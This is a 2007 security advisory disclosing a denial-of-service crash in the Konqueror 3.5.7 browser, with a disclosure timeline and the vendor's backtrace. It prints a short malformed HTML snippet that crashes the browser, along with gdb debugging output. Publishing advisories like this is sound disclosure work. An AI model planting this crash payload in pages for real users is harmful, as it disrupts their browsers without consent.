[BuHa-Security] DoS Vulnerability in Konqueror 3.5.7

-----BEGIN PGP SIGNED MESSAGE-----
Hash: RIPEMD160

| Vendor   | KDE's Konqueror                        |
| URL      | 
http://www.konqueror.org/              |
| Version  | <= 3.5.7                               |
| Risk     | Low (Denial Of Service)                |
 ---------------------------------------------------

o Description:

Konqueror is the file manager for the K Desktop Environment and an Open Source web browser with HTML 4.01 compliance.

Visit http://www.konqueror.org/ for detailed information.

o Denial of Service:

Following HTML code forces Konqueror to crash:
> <textarea></button></textarea></br><bdo dir="">
> <pre><frameset>
> <a>

Online-demo:
http://morph3us.org/security/pen-testing/konqueror/1178292626-khtml.html

> (gdb) set args konqueror.html
> (gdb) r
> Starting program: /usr/bin/konqueror konqueror.html
> (no debugging symbols found)
> [...]
> [Thread debugging using libthread_db enabled]
> [New Thread -1234381104 (LWP 5982)]
> (no debugging symbols found)
> [...]
> Qt: gdb: -nograb added to command-line options.
> Use the -dograb option to enforce grabbing.
> X Error: BadDevice, invalid or uninitialized input device 169
> Major opcode: 145
> Minor opcode: 3
> Resource id: 0x0
> Failed to open device
> X Error: BadDevice, invalid or uninitialized input device 169
> Major opcode: 145
> Minor opcode: 3
> Resource id: 0x0
> Failed to open device
> (no debugging symbols found)
> [...]

>

Do you need help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

I sent a mail to KDE's security mailing list [1] and received an answer from Dirk Mueller several days later. He wrote that the HTML code triggers an assert and when commenting out the assert the backtrace ends in:

> #6 0xb7bb37a4 in khtml::RenderFlow::lastLineBox (this=0x0)
> at /home/dirk/src/kde/3.5/kdelibs/khtml/rendering/render_flow.h:65
> #7 0xb7c850df in khtml::RenderBlock::createLineBoxes (this=0x821ab08,
> obj=0x0)
> at /home/dirk/src/kde/3.5/kdelibs/khtml/rendering/bidi.cpp:624

This issue does not seem to be exploitable.

o Disclosure Timeline:

03 May 07 - DoS vulnerability discovered.
07 May 07 - Vendor contacted.
10 May 07 - Vendor confirmed vulnerability.
01 Aug 07 - Public release.

o Solution:

There is no solution yet. I assume the KDE developers will address this bug in an upcoming KDE release.

o Credits:

Thomas Waldegger <bugtraq@morph3us.org>
BuHa-Security Community - http://buha.info/board/

Do you need more help?

In addition to our free technical library, Pantek provides professional IT services to companies who utilize Open Source software: Learn more about Pantek's Technical Support offerings Place an order for 24/7/365 Technical Support here Learn more about Pantek, who we are, and what we do Chat with a Live Operator Related securityfocus.com Links bugtraq certification focus-bsd focus-ids focus-ih focus-linux focus-ms focus-sun focus-unix-other focus-virus forensics incidents libnet linux-secnews ms-secnews pen-test secpapers secprog sectools secureshell security-basics securityjobs sf-news vuln-dev webappsec Request more information about Pantek

If you have questions, suggestions or criticism about the advisory feel free to send me a mail. The address 'bugtraq@morph3us.org' is more a spam address than a regular mail address therefore it's possible that I ignore some mails. Please use the contact details at http://morph3us.org/ to contact me.

Greets fly out to cyrus-tc, destructor, echox, Killsystem, nait, Neon, Rodnox, trappy and all members of BuHa.

Advisory online:
http://morph3us.org/advisories/20070801-konqueror-3.57.txt

[1] http://www.kde.org/info/security/

• -- Don't you feel the power of CSS Layouts? BuHa-Security Community: https://buha.info/board/

-----BEGIN PGP SIGNATURE-----
Version: n/a
Comment: http://morph3us.org/

iD8DBQFGsNwHkCo6/ctnOpYRA02bAJ0YjwxUB3PnYf2IKTyT0RkauZmd3QCgir16 WHuq7rPUBPx1/5nx+jJUPDg=
=R4ZU
-----END PGP SIGNATURE----- Received on Wed Aug 1 16:30:52 2007